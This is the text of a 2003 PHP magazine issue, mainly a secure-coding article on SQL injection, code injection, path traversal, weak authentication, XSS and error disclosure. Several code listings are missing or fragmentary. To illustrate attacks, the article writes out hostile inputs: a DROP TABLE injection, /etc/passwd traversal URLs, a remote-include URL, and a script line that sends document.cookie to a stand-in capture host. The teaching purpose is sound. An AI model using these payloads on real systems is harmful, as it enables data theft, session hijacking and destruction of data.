TABLE OF CONTENTS

Departments
EDITORIAL: From the front line
What's New!
Product Review: Lumenation and LightBulb
Book Review: Core PHP Programming 3rd Edition
Tips & Tricks, by John W. Holmes
Bits & Pieces: Real. Interesting. Stuff.
exit(0); Buy vs. Build, by Marco Tabini

Features
Secure PHP Coding, by David Jorm and Jody Melbourne
Introduction to Bug Management, by Dejan Bosanac
Advanced Database Features Exposed, by Davor Pleskina
Creating a Reusable Menu System with XML and PHP, by Leon Vismer
Printing with PHP, by Alessandro Sfondrini
Installing Java for PHP, by Dave Palmer

September 2003 · PHP Architect · www.phparch.com
EDITORIAL
In the relatively short time that I've been with php|architect (about six months now), I've seen a lot of our magazine content cross my (very messy) desk. In that same time period, I've been committed to gobbling up any and all PHP content gracing the pages of other publications and developer sites. I now feel that I am qualified to state an opinion: We have great content.

Our authors consistently dig deep into their topics, bringing you their practical experience, examples, and well-written explanations. Their enthusiasm for their articles shines through, and brings warmth and community to the pages of php|architect every month. We constantly demand the best from our authors, and they, in turn, demand the best from us.

The php|architect editorial team prides itself on being transparent, and I believe that authors enjoy writing for us because of it (maybe this helps explain why there are only two new authors and four return authors this month). By transparent, I mean that we are honest and up front with them, as well as ourselves. We view our authors as collaborators and team members, never as service providers or vendors. We are easy to work with, and are eager to bend over backward to help if we can see that an honest effort is being made. Through all of this we never compromise our integrity or settle for second best. Really, though, how could we? We serve one of the greatest software communities in the world!

This brings me to my next point. I am absolutely ecstatic to have been bestowed the honor of directing the editorial path of php|architect. Our authors, our readers, and our editorial team have all worked hard to build an excellent resource that brings you the best that the PHP world has to offer each and every month.
The hardest part of my new role here at php|a will probably be trying to fill Brian's shoes – he's got really big feet.* Brian has worked extremely hard to foster long-term relationships with our authors, and I will be working feverishly to continue to build and maintain that community, as well as various other initiatives on the front and back-end of the publication. But don't worry, I'm still sleeping four hours a night.

I sincerely hope you enjoy this month's issue. People lost hair, sleep, and teeth over it. And, as always, if you see anything you particularly like or don't like in our magazine this month, I strongly encourage you to send us your feedback at [email protected]. Even fan letters firmly stating that "You suck." will be warmly accepted, as they help to break up the large amounts of spam that we all get from that address.

* Actually, I've never physically seen Brian, or Brian's shoes... I'm pretty sure I can smell them, though.

php|a

Volume II - Issue 9, September 2003
Publisher: Marco Tabini
Editor-in-Chief: Peter James [email protected]
Editor-at-Large: Brian K. Jones [email protected]
Editorial Team: Arbi Arzoumani, Peter James, Brian Jones, Eddie Peloke
Graphics & Layout: Arbi Arzoumani, Hammed Malik, Marina Zlatogorov
Managing Editor: Emanuela Corso
Director of Marketing: J. Scott Johnson [email protected]
Account Executive: Shelley Johnston [email protected]
Authors: Dejan Bosanac, David Jorm, Dave Palmer, Davor Pleskina, Alessandro Sfondrini, Leon Vismer

php|architect (ISSN 1705-1142) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box 3342, Markham, ON L3R 6G6, Canada. Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibilities with regards of use of the information contained herein or in all associated material.
When in Rome... Go to PHP Day 2003!

The first conference dedicated exclusively to the Italian PHP Community, called PHP Day 2003, will take place on October 24, 2003 in Rome at the Universita' Tor Vergata. The program includes several speakers from the Italian technical community, and focuses on the theme of interface development, as well as a few tutorials to get the beginners up and running. Most of all, PHP Day revolves around the concept of providing the PHP community with an opportunity to meet and exchange their experiences. If you live in Italy, this is a great opportunity to meet your fellow PHP enthusiasts. If you don't live in Italy... this might be the perfect excuse for that long-postponed vacation! For more information on PHP Day, visit http://www.phpday.it or mail the organizers at [email protected].
What's New!

PHP 4.3.3
PHP.net announced the release of PHP 4.3.3. This release contains a large number of bug fixes and it is recommended that all users upgrade to this version. Changes include:
• Synchronized bundled GD Library with GD 2.0.15
• Upgraded the bundled Expat Library to version 1.95.6
• Improved the engine to use POSIX/socket IO where feasible
• and much more
Visit php.net to download or view the change log.
Apache Cocoon 2.1
Apache Cocoon is a web development framework built around the concepts of separation of concerns (making sure people can interact and collaborate on a project, without stepping on each other's toes) and component-based web development. Cocoon implements these concepts around the notion of 'component pipelines', each component on the pipeline specializing in a particular operation. This makes it possible to use a Lego(tm)-like approach in building web solutions, hooking together components into pipelines without any required programming. Cocoon is "web glue for your web application development needs". It is a glue that keeps concerns separate and allows parallel evolution of the two sides, improving development pace and reducing the chance of conflicts. Cocoon has a PHP Generator which is not included in the binary distribution but can be found at: cocoon.apache.org/2.1/userdocs/generators/php-generator.html
Get more information or download from the Cocoon Project Page: cocoon.apache.org/
PhpBB 2.0.6
The phpBB Group is pleased to announce the release of phpBB 2.0.6, the "phew, it's way too hot to be furry" Edition. This release has been made to fix a number of potential security-related issues and more annoying bugs. Work continues on 2.2.0 and another 2.0.x release is not planned except where critical issues arise. phpBB.com describes phpBB as: "...a high powered, fully scalable, and highly customisable open-source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites."
phpBB strongly advises all users to upgrade. Get more information from phpBB.com.

ZEND Studio 3.0.0 Beta
Zend.com announced this month the release of the Zend Studio 3.0.0 Beta for Windows and Mac. The latest release includes:
• Code Profiler – Determine which scripts are slowing down your project so you can focus your time on improving their performance
• One-click debugging and profiling tool – Direct debugging and profiling of web pages directly from your browser
• Code Analyzer – Pinpoint messy code, allowing you to write cleaner, more correct code
• Highlight syntax errors – Write clean PHP code while you are typing
• Support for PHP 5.0 – Including syntax highlighting, code completion, file and project inspectors
• Dramatic performance improvements
• Code Completion improvements – Including improved speed, recognized constants, and new function arguments view
• and much more
Get more information or download from Zend.com.
Japha 1.3.3
The Japha site touts it as "An Expandable Implementation of Java in PHP". From Japha (japha.xzon.net/index.html): "Japha is an attempt to bring the main classes in the Java 1.4.1 (soon to be 1.4.2, time allowing) to PHP for use in everyday programs. We do this using the syntax that has been made common with the new releases of PHP 5. This allows us to easily implement interface, abstract classes, and more inheritance capabilities, not to mention excellent error handling and the ability to better conform with user-created data types."
Get more information or download the latest version from Japha.xzon.net

LightBulb 4.79
LightBulb (formerly EzSDK) is a PHP SDK which includes a PHP source code generator, a library of PHP Classes, and an application environment consisting of premade supporting modules. The modules handle user application and data access security, DB compatibility, a built-in GUI interface with an interactive desktop and more. Check out this month's product review for more information. This release contains changes to the spell checking features. Spell checking of user data is now an inherent, interactive user option throughout the system. Developers are able to utilize the spell check features throughout every application developed without writing any source code to facilitate this.
Get more information or view the demo at ezsdk.com

php|a
Secure PHP Coding
by David Jorm and Jody Melbourne

Web applications, by their very nature, have a broad exposure to remote attackers and a set of potential vulnerabilities as rich as the languages and protocols from which they are born. Web applications are handling an ever-growing list of business functions, and the code driving them must be paid due attention with regard not only to performance and stability, but also to security. This article is aimed at providing a concise listing and discussion of the most common vulnerabilities that exist in PHP web applications. This vulnerability listing is used at the end of the article as the basis for developing coding and code audit/testing methodologies which can be applied to any PHP web application. Note that, for the sake of brevity, only the most common and severe vulnerabilities have been listed and that vulnerabilities outside the scope of PHP code (such as those which may exist in a web server or PHP itself) are not covered by this article.
NOTE: All examples use the HTTP GET method so that attacks can be easily illustrated as URIs. Keep in mind that using POST is no defence; the variables are simply in the HTTP message body rather than the query string component of the URI. From a theoretical perspective, at least, POST variables are just as easy to manipulate as GET variables.
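The point of the note can be illustrated with a few lines of PHP. The sketch below assumes a current PHP version; the field names and the URL in the closing comment are made up for illustration. It builds an HTTP POST body by hand, without a browser and without the site's own form.

```php
<?php
// Hypothetical field names: any client can choose both names and values.
$fields = ['id' => '123', 'lang' => 'en'];

// Encode the fields exactly as a browser would for a form submission.
$body = http_build_query($fields);

// Describe a POST request carrying that body.
$context = stream_context_create([
    'http' => [
        'method'  => 'POST',
        'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
        'content' => $body,
    ],
]);

echo $body, "\n";

// Passing $context to file_get_contents() together with a target such as
// http://example.com/handler.php (a placeholder) would send the request.
```

The handler on the receiving end sees these values just as it would see values typed into its own form, so the same validation is needed whichever method is used.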
SQL Injection

An SQL injection vulnerability can rear its ugly head when user-submitted variables are used to assemble SQL queries on the server side without sufficient input validation. An attacker can then manipulate the underlying SQL statement or inject additional SQL statements. SQL injection is one of the most common web application vulnerabilities, but does not affect PHP code as much as other languages, mostly due to PHP's automatic character escaping and built-in validation functions. A sample vulnerability is shown in Listing 1. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing1.php?artid=0%20or%20ArticleID%20<>%200

Note that the value being passed to artid is a urlencoded version of "0 or ArticleID <> 0". Making a call to the link above would cause the following value to be assigned to $ssql and executed on the SQL server:

SELECT ArticleContents FROM Articles WHERE ArticleID = 0 OR ArticleID <> 0

Some database servers also allow multiple SQL statements to be concatenated using a semicolon (;) as a separator. In that case, the following attack could be used:

http://www.server.com/listing1.php?artid=0;%20DROP%20TABLE%20Articles

In this case, the urlencoded value being passed into artid is "0; DROP TABLE Articles". You can imagine the problems that this might cause.

The key to protecting code against SQL injection attacks (and against most web application vulnerabilities) is rigorous input validation. PHP can automatically escape some characters, such as apostrophes ('), when the magic_quotes_gpc setting is enabled, providing protection against attacks involving those characters, but this is not sufficient immunity. All user-controlled variables used to construct SQL statements or other commands must be stripped of any content that may alter the effects of the query. For numeric inputs, either verify that the value is indeed numeric, or make it numeric using settype(). For non-numeric inputs, run the variable through addslashes() or addcslashes() before using it to construct a query. The vulnerable example above is patched in Listing 2. More information on patching against SQL injection is available at www.zend.com/manual/security.database.php.

In testing for SQL injection, the blackbox tester studies application inputs and attempts to insert special characters (such as commas, apostrophes, semicolons, quotation marks, and equal signs) or SQL keywords (AND, OR, SELECT, INSERT, etc). With many of the popular backends, informative error pages are displayed by default, which can often give clues to the underlying SQL query. For example, a request with an apostrophe appended to the itemID value, instead of

http://example.com/items.php?itemID=123

could return a telltale error like this one:

mySQL error with query SELECT myitem FROM shop_item WHERE itemid=123';: You have an error in your SQL syntax near ''' at line 1
It is evident from this response that the value for itemID is being used directly (without any validation) within an SQL query.

Listing 2 (fragment)
" . $resarr[0] . "\n";
}
mysql_close($conn);
?>

PHP Code Injection

When user-defined inputs form the file path parameters used to call include(), fopen() or other similar functions, there are several possibilities for exploitation. The first, PHP code injection, is based on manipulating the input to include() to run the attacker's own PHP code. The second, path traversal, is based on manipulating the input to include() or fopen() to display files or create an open proxy. Note that both of these bugs rely on the same basic problem and overlap somewhat.

PHP code injection is similar to SQL injection, but involves native PHP code being injected by the user rather than SQL. This is made possible when the code makes use of the include() function. The include() function will accept a file name or URI (if the appropriate wrapper is installed) and include the contents of the resource as part of the PHP program. This is frequently used as a means of keeping libraries of code separate, and applications more modular, calling include() to load needed functions at runtime or 'on demand', but it's also frequently misused to include local text files, or worse, remote data from a URI. PHP code injection is achieved by placing malicious PHP code inside a resource which is run through include(), or finding a way to have the include() call load something unintended by the application developer. A sample vulnerability is shown in Listing 3. A sample attack on that vulnerability supplies the address of a script hosted by the attacker as the input.

Making such a call would cause the contents of www.hacker.com/phpinjection.php to be included into the program and executed locally. This page could output any malicious code the attacker can conjure up.

The primary strategy for defending against code injection attacks is to use include() appropriately. Having URI file wrappers enabled (controlled by the allow_url_fopen setting) is generally a security liability and if your site does not explicitly use them, they should be disabled. If it is necessary to have user-manipulable variables run through include(), ensure that they are properly validated. Listing 3 is patched in Listing 4.

When trying to locate these vulnerabilities via blackbox testing, the tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this elicits a response from the application which might aid an attack. Imagine that a regular (non-malicious) URL looks like this:

http://example.com/main.php?in=links.inc

Let's look at what we get if we change the query string a little, as follows:

http://example.com/main.php?in=../test.inc

The response from the application might be some telltale warnings, like so:

Warning: main(./../test.inc) [function.main]: failed to create stream: No such file or directory in main.php on line 102
Warning: main() [function.main]: Failed opening './../test.inc' for inclusion (include_path='.:') in main.php on line 102

This response indicates that the value of the 'in' variable is being used within an include() call. In this case, an attacker would be able to submit a request such as:

http://example.com/main.php?in=../../../../etc/passwd

to open (include) any readable file.

Path Traversal

Very closely related to PHP code injection is path traversal. Although Listing 4 protects against PHP code injection, it applies no input validation to the page GET variable, allowing the user to enter not just a file name but an absolute path. This can allow an attacker to view any file that the web server has permission to read. If URI wrappers were enabled, it would also allow an attacker to use the site as an open proxy to view other resources on the web. A sample vulnerability is shown in Listing 5. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing5.php?page=../../../../../etc/passwd
Calling the above link might cause the contents of /etc/passwd to be returned to the attacker, obviously not what the script was supposed to do! If URI wrappers were enabled, the following attack could also be used:

http://www.server.com/listing5.php?page=http://www.phparch.com
This would cause the web server to fetch the contents of the URI www.phparch.com and return them to the attacker, effectively working as an open proxy. Oh, what we wouldn't do for our daily dose of PHP goodness!

The key to defending against path traversal attacks is, once again, input validation. Ideally, all files that the script is serving can be numerically sequenced, requiring only a numeric input of the file number from the user. A patched version of Listing 5 using this method is shown in Listing 6. Alternatively, the page variable can be stripped of all characters which may allow a user to enter an absolute path or URI. A patched version of Listing 5 using this method is shown in Listing 7.

These vulnerabilities can often be located through blackbox testing of the application. The tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this returns (or attempts to return) arbitrary files. Imagine that a regular (non-malicious) URL looks like this:

http://example.com/viewfile.php?cat=users

To test for path traversal, we might use the following URLs:

http://example.com/viewfile.php?cat=/etc/motd
http://example.com/viewfile.php?cat=../../../../etc/passwd

If the tester receives a 'File not found' or 'Cannot open' error, it may simply be a matter of adjusting paths or increasing the number of traversal characters (../). fopen() and include() error messages are generally very informative in describing the error, and can give the tester all the information needed to correctly manipulate this request.

Trusted User Manipulable Values

A major problem with the web application environment and the advanced tools used within it, of which PHP is only one, is the fact that they hide the source of some inputs from the developer. For example, with register_globals enabled, PHP will expose the contents of a form field, GET variable or POST variable indiscriminately as a variable with the same name as the field or HTTP variable. Developers come to rely on this feature and can fail to consider whether a trusted variable, such as the value of a product or name of a file, comes from a source which cannot be manipulated by an attacker.

The classic example is hidden form fields used to carry session-related variables, such as the name and value for products on an e-commerce site. The developer is relying on the notion that since he has set these values, he will read them back in from the subsequent form, unchanged. But when a form is submitted, the contents of the form fields are simply passed to the resource in the FORM tag's ACTION attribute as either GET or POST variables, as specified by the METHOD attribute. An attacker can then change the price of products by making his own form carrying the desired values, or manipulating GET/POST variables manually. A sample vulnerability is shown in Listings 8 (the HTML form) and 9 (the form handler). A sample attack on that vulnerability might look like the following:

http://www.server.com/listing9.php?price=1&cc=5353167819823
Calling the link above allows an attacker to successfully place an order, using a valid credit card, but with a price of the attacker's choosing, in this case $1. The developer is presuming that the only way his form handler will be accessed is via Listing 8, where the price value is set by a PHP variable. Were POST being used rather than GET, an attacker could construct an HTML document, as shown in Listing 10, and place the order for $1 by simply submitting the new form.

Trusted variable vulnerabilities can be avoided by setting session-related variables appropriately, using sessions or cookies (although both of these have some, albeit lesser, problems in their own right). A preferable solution would be to always reference the price from a database on the server side and carry a productid variable in a PHP session or browser cookie. Both of the previous vulnerabilities are patched with Listings 11 and 12.

The blackbox tester examines all available source pages for evidence of HIDDEN or dynamically-generated variables. The tester saves a copy of the form page locally and manipulates these variables, loads the form page into a browser and submits the modified request. In many cases, the tester may not be able to determine if the modified values have been accepted unless they are displayed on a subsequent page (such as in the Checkout page of a shopping-cart application).
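The server-side price lookup recommended above can be sketched as follows. This is only an illustration under stated assumptions, not a reconstruction of the article's Listings 11 and 12: the $catalogue array stands in for a database table, and the function name, the productid field and the prices are hypothetical. The sketch assumes a current PHP version.

```php
<?php
// Hypothetical catalogue standing in for a server-side database table.
$catalogue = [
    101 => ['name' => 'Widget', 'price_cents' => 4999],
    102 => ['name' => 'Gadget', 'price_cents' => 12999],
];

/**
 * Look up the price for a client-supplied product id.
 * Returns the price in cents, or null if the id is malformed or unknown.
 */
function lookupPrice(array $catalogue, $rawProductId)
{
    // Accept only non-empty strings consisting entirely of digits.
    if (!is_string($rawProductId) || !ctype_digit($rawProductId)) {
        return null;
    }
    $id = (int) $rawProductId;
    return isset($catalogue[$id]) ? $catalogue[$id]['price_cents'] : null;
}

// Stand-in for $_GET or $_POST: the forged "price" field is never read.
$request = ['productid' => '101', 'price' => '1'];
$price = lookupPrice($catalogue, $request['productid']);
echo $price === null ? "Unknown product\n" : "Charging {$price} cents\n";
```

Because the handler only ever reads the product identifier, a forged price value has nothing to act on; the worst a manipulated request can do is name a different or nonexistent product.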
Weak Authentication

Despite the widespread gospel that clear-text authentication credentials are a cardinal sin and that passwords should conform to minimum complexity rules, these fundamentals of secure programming are frequently not applied in the web application world. HTTP includes two standard authentication mechanisms: basic and digest. Both mechanisms operate as a series of HTTP exchanges with a demand for authentication issued by the server in an HTTP header, followed by a repeated request from the client, including authentication credentials in another HTTP header. The primary difference is that basic authentication sends the credentials in clear text, simply base64 encoded, while digest sends a hash of the credentials computed with a nonce (a time-sensitive value) issued by the server.

Basic authentication can be set up easily by using PHP's header() function to issue the required header. The $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'] variables are created by PHP when a request has included authentication credentials. This is, unfortunately, promoted by many tutorials on PHP programming. The main alternative to basic HTTP authentication is to have a custom solution where a session id or cookie is issued to the client once it has successfully authenticated, this token then being checked with each subsequent request for a protected resource. This relies on the developer correctly enforcing password complexity rules and is vulnerable to replay attacks. A sample vulnerability is shown in Listing 13 (allowing a weak password to be set) and 14 (doing effectively clear-text authentication).

Lack of complexity rules can make you vulnerable to brute force attacks, because with short and common passwords little key space will need to be exhausted before an attacker finds his way in. Brute force attacks most commonly work either from a dictionary file of common words, or in an incremental mode trying every possible string. Sometimes a hybrid of the two is used, attaching short incremental suffixes and prefixes to common words. Listing 15 is an example of an incremental-mode brute-forcing tool. Basic HTTP authentication is vulnerable only to third party attack, where an attacker is sniffing or otherwise intercepting the site's communication and extracting the clear text authentication credentials. No sample attack is provided for extracting clear text credentials.

There is no patch, as such, for the use of basic HTTP authentication. The point was merely to illustrate that its use, without SSL or some other form of encryption, is a security liability. Password complexity rules, however, can be applied in a variety of ways. PHP functions are available to utilise the CrackLib library to check the strength of passwords. The strength is determined by length, use of upper and lower case and dictionary checks. If CrackLib is not available or you wish to enforce custom business rules for password strength, writing your own implementation is simple. Listing 13 is patched using a custom password strength test in Listing 16.

To identify these vulnerabilities, the blackbox tester must first identify the authentication method in use. If basic HTTP authentication is being used, the tester can attempt to brute-force a valid login and password pair; in most cases, account lockout restrictions are not enforced. There are many tools available online to test the strength of basic HTTP authentication. One of the more popular password cracking tools is Cain&Abel, available from http://www.oxid.it/cain.html

Poorly-Applied Authentication

Authentication mechanisms can sometimes fail to cover every access method for a resource and restrict access accordingly. The classic example is a menu driven by permissions associated with authentication credentials providing access to a list of resources the user is allowed to view. The resources themselves, however, do not require authentication credentials and rely on the notion that they are hidden unless access to them is provided via a menu. This is security through obscurity, and is a major flaw. A recent high-profile example of this problem is an Australian Taxation Office site where a user provided detailed credentials to authenticate their identity and was then allowed to view details associated with their Tax File Number. The page providing this access simply accepted the Tax File Number as a GET variable, such as:

http://www.ato.gov.au/viewtfn.php?tfn=231897
An attacker could simply plug in another TFN to view its details:

http://www.ato.gov.au/viewtfn.php?tfn=999999
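One way to close a hole of this kind is for the resource itself to compare the requested identifier with the identity established at login, rather than trusting the GET variable. The following is a minimal sketch under stated assumptions: the function name and the 'tfn' session key are hypothetical, $session stands in for $_SESSION, and nothing here reflects how the site in question actually works.

```php
<?php
/**
 * Decide whether the current session may view the requested record.
 * $session stands in for $_SESSION; the 'tfn' key is a hypothetical
 * value stored at login after the user's credentials were verified.
 */
function mayViewRecord(array $session, $requestedTfn)
{
    if (!isset($session['tfn']) || !is_string($requestedTfn)) {
        return false;   // not logged in, or malformed request value
    }
    // Strict string comparison: the request must name the session's own record.
    return $requestedTfn === (string) $session['tfn'];
}

$session = ['tfn' => '231897'];                  // set by the login routine
var_dump(mayViewRecord($session, '231897'));     // the user's own record
var_dump(mayViewRecord($session, '999999'));     // someone else's record
```

The check runs on every request for the resource, so changing the number in the URI gains nothing unless the session was authenticated for that number.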
A sample vulnerability is shown in Listings 17 (the menu) and 18 (the resource). A sample attack on that vulnerability might look like the following:

http://www.server.com/listing18.php?res=1
By accessing the above URI, an attacker can bypass the authentication applied by Listing 17, and go straight to the resource (Listing 18) it was designed to provide access to. The best strategy to avoid these kinds of problems is to apply authentication at every individual resource, so it can never be bypassed. In the production world, your authentication would never be as simple as the ‘if’ test used in Listing 17, so a convenient technique is to create an authentication class and include it with every resource. These vulnerabilities are patched by Listings 19 (the authentication class) and 20 (the protected resource).

September 2003 ● PHP Architect ● www.phparch.com

Listing 16

Listing 19

Authentication and logic flaws in applications can sometimes be located via blackbox testing methods. The tester, using valid credentials, authenticates to the application and interacts as a normal user. At every point beyond the initial authentication routine, the tester locates any GET and POST variables, manipulates them using valid data, and examines the output. Imagine that a regular (non-malicious) URI looks like this:

http://example.com/members/index.php?startpg=10167&lang=en

A blackbox tester might try the following:

http://example.com/members/index.php?startpg=10169&lang=en

In the above example, the user might expect to receive an ‘unauthorized’ error message when attempting to submit an alternate ‘startpg’ variable. If authentication has only been applied to the application portal page (and subsequent requests are not being re-authenticated) an attacker may be able to request arbitrary start pages.

Cross-Site Scripting

Many sites, such as message forums, allow a user to enter content and post it to the site. This is usually handled using an SQL database to store messages and PHP code to add and render posts on demand. If the contents of these messages are not stripped of HTML tags and Javascript code, an attacker can effectively inject client-side scripts which will be run under the security context of the message forum. This vulnerability, however, is not limited to message forums. Any site where the contents of user-defined variables such as GET/POST variables, HTTP headers or cookies will form part of the page returned can be vulnerable to cross-site scripting, or XSS. As an example of XSS outside of a classic message forum example, take the following URI:

In this case, the q variable would be set to “<script>alert(document.cookie);” . This will run the Javascript code alert(document.cookie); within the security context the user has set for ninemsn.com.au. This will expose the user’s cookie for the site. On a message board this could well include a session id token which could be replayed to hijack their session. This could then be logged to a remote capture application using Javascript code such as:

<script>window.open('http://www.server.com/capture.php?cookie=' + document.cookie);

A sample vulnerability is shown in Listing 21. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing21.php?query=%3Cscript%3Efor+%28i%3D0%3B+i%3C100%3B+i%2B%2B%29+%7B+window.open%28%27http%3A%2F%2Fwww.porn.com%2F%27%29%3B%7D+%3C%2Fscript%3E

This would cause the “query” GET variable to contain:

<script>for (i=0; i<100; i++) { window.open('http://www.porn.com/');} </script>

Accessing the above URL would cause www.porn.com to be opened in a new window 100 times by a Javascript-enabled browser. Defending against XSS is not simply a matter of stripping special characters as with SQL injection. Not accepting certain input may limit the functionality of the site. A better strategy is to parse user-defined inputs after they have been used by the PHP script, but before being returned as part of the response, to replace ‘<’ and ‘>’ characters with ‘&lt;’ and ‘&gt;’ respectively. This will prevent ‘<script>’ or other tags from being injected. Listing 21 is patched using this technique in Listing 22.

Cross-site scripting vulnerabilities are generally quite easy to locate using blackbox testing methods. The tester examines all GET and POST variables to determine if any of these values are being returned within page outputs. In the example below, the tester can safely assume that the contents of the Title variable will be used somewhere within the returned page. Imagine that a regular (non-malicious) URI looks like this:
The tester inserts HTML special characters (<>) into the Title variable and resubmits the request.

http://example.com/index.php?articleID=1234&Title=

If the injected HTML can be found within the returned page, then this application is vulnerable to cross-site scripting. In this case, if the Title value is being used directly between <title> and </title> tags, without filtering of <> characters, additional HTML and Javascript can be injected into the returned page.

Environment Information Disclosure

By default, PHP displays all warnings and errors. These frequently contain verbose information pertaining to the operating environment, such as file paths, database credentials and configuration details. A sample vulnerability is shown in Listing 23. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing23.php

If an attacker runs the above URI when the database server is down and /mnt/data/file1.txt is not available, the following error (with HTML removed) will be given by PHP:

Warning: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2
Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2
Warning: fopen(“/mnt/data/file1.txt”, “rb”) - No such file or directory in C:\PHP\phparch\env.php on line 3

This discloses both the name of the database server and the path from which the script is reading files. Although this does not open the site to any specific attack, it is not good security practice to disclose this kind of information. The best strategy to prevent this is to disable error reporting on production sites and reserve it for development use. This is best implemented in php.ini but is illustrated using the error_reporting() function in Listing 24.

The blackbox tester inserts special characters into all identified GET and POST variables in an attempt to elicit exception conditions from the application. Errors from failed include(), popen(), fopen() and DB-related calls can be extremely informative and may assist the tester in identifying further vulnerabilities. Imagine that a regular (non-malicious) URI looks like this:

http://example.com/index.php?articleID=1234
Let’s look at what we get if we change the query string a little, as follows:

http://example.com/index.php?articleID=1234abc’%;

The server’s response could be as follows:

Warning: Supplied argument is not a valid MySQL-Link resource in /www.example.com/cgi-bin/index.php on line 46
Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘sql.example.com’ (2) in /www.example.com/cgi-bin/index.php on line 45

Listing 22
<?php
// Replace angle brackets with HTML entities before echoing user input
$q = str_replace(array('<', '>'), array('&lt;', '&gt;'), $_GET['query']);
echo "You searched for " . $q;
?>

Listing 23

Listing 24
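The text describes Listing 24 as using error_reporting() to keep warnings like the ones shown in this section away from visitors. A minimal sketch of that idea follows. It is not the original listing: the function name configure_error_output() and its $production flag are hypothetical, and instead of switching reporting off entirely it assumes you still want errors written to the server log.

```php
<?php
// Hypothetical helper: choose error settings for the current environment.
// Assumption: production hides errors from the browser but still logs them.
function configure_error_output(bool $production): void
{
    // Keep reporting everything internally in both environments.
    error_reporting(E_ALL);

    // Never print warnings (file paths, host names) into a production page.
    ini_set('display_errors', $production ? '0' : '1');

    // Keep a server-side record so problems are not silently lost.
    ini_set('log_errors', '1');
}

configure_error_output(true);
```

Calling the function once at the top of a script, or setting the same directives in php.ini, keeps file paths and host names out of the page while leaving a trail for the developer.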
Secure Coding Methodology

The key to coding secure web applications in PHP is to be aware of the potential flaws that your code may be vulnerable to, and to be attentive in preventing these flaws throughout the entire development process. Too often security is an afterthought or added feature. The most secure code is written with security in mind from the word ‘go’.

Testing Methodology

The blackbox testing method is where a security professional attempts to expose flaws in an application. The term ‘blackbox’ refers to the closed-source or proprietary application, and the process of manipulating known inputs and analyzing outputs from the application. In blackbox testing PHP code, the tester examines the application and identifies all of the expected GET and POST variables, including hidden and dynamically-generated variables. These variables are then manipulated using potentially “unexpected” values, such as special characters and type-mismatched or oversized requests. In most cases, the PHP application’s expected inputs can be identified by reading all available HTML source pages, and/or capturing and decoding valid requests. As an example, examine the following URI:

In the above example, the GET variables that should be manipulated and tested are ID, title and lang. As another example, examine the form in Listing 25. Here, the POST variables to be tested are ‘sid’, ‘listid’ and ‘usermail’. The tester inserts special characters into each of these inputs, and submits the request. Output is analyzed to determine if the application handled the input correctly, or if some unexpected error has occurred. Manipulated POST variables can be submitted using a command-line tool such as lynx or curl, or a copy of the form input page can be saved and modified locally. Manipulated GET variables can be submitted using a regular browser. Unexpected behavior may take the form of half-loaded or blank pages, or a redirect to a front page. If the application displays an error message, the tester can determine if it is vulnerable to any of the common PHP coding errors detailed in this article.

Listing 25

Conclusion

Web applications are, in security terms, a different ball game from conventional applications. The communication protocols, server-side application code and client-side presentation code combine to form a development environment in which bugs can make use of problems in various components of the technology simultaneously. To compound this problem, web technology was originally designed to handle the public dissemination of markup documents, not the development of secure applications. This is slowly being rectified, but the developer must remain astute to security concerns if he is to produce secure applications. Hopefully what has been outlined above can assist in the creation of more secure web applications.

About the Author

David works as a document imaging and OCR programmer for a small Australian company. He spends his spare time writing PHP code and studying environmental science.

Click HERE To Discuss This Article http://forums.phparch.com/44
Introduction to Bug Management
F E A T U R E
by Dejan Bosanac
What is a bug?

It all started in 1947 at Harvard University, while operators were testing the Mark II Aiken Relay Calculator for a malfunction. A moth was found trapped between two electrical relays. Operators removed the moth and entered the log entry “First actual case of bug being found.” They said that they had “debugged” the machine, and the term “debugging a computer program” was introduced. Anyone who has ever used any kind of software is familiar with the term “bug”. But before we proceed further with our story, we should make it clear what we mean by this term. The classic definition of a bug is that it is an error in software code that causes the program to malfunction. We must be careful with this, however, because it is very closely related to the requirements of our project. We can’t tell that something is not working properly unless we know the desired behavior. Some users, for example, can interpret the lack of certain functionality as a bug. Because of this thin line between bugs and functionality, it is good practice to do request tracking along with the bug tracking process, as we will see later in the text. We will introduce a new term, issue, to describe both bugs and feature requests.

The layman would say that bugs in software are only the result of programmer carelessness, but anyone who has ever worked on a large software project knows that is not always true. Sometimes projects are so complicated that a minor change in one module could produce an unexpected disaster where it is least expected. There are many software techniques that show how to take your software’s quality to a higher level, but that is way beyond the scope of this article. Here, we will try to concentrate on how to keep track of the bugs (and requests) in your project. We will also learn how to organize the development process so that most of the malfunctions in the software code are detected before final release and not by your customers.

Life cycle of a bug

The first thing you will always hear when discussing software testing and quality assurance is that the person who implements the code should not be the person who is testing it. There are a few reasons for this statement. The first is that the person who is actually writing the code has his own mindset and cannot see certain flaws in the design even if he looks at it for a very long time. Another person, who is only looking at the code’s behaviour, can easily spot things that the original writer missed. The second argument is rather psychological: the tester should act destructively against the code, which is very hard to do with your own work. We won’t go deeper into details about software testing, which could be the topic of some future article, but this story is very important in establishing roles in our bug management process. Three roles are necessary for successful bug tracking:
• Developer – person who actually writes code and fixes bugs
• Tester (QA staff) – person who tests the code and writes bug reports. This person, as we will see later, also verifies that a certain bug is fixed
• Project manager – person who assigns certain properties to bugs (as we are going to see in the next section) and assigns them to developers for fixing

Bug Life Cycle
QA submits bug report → Project manager reviews the bug report and assigns it if necessary → Developer fixes the bug → QA verifies that bug is fixed → Bug gets closed

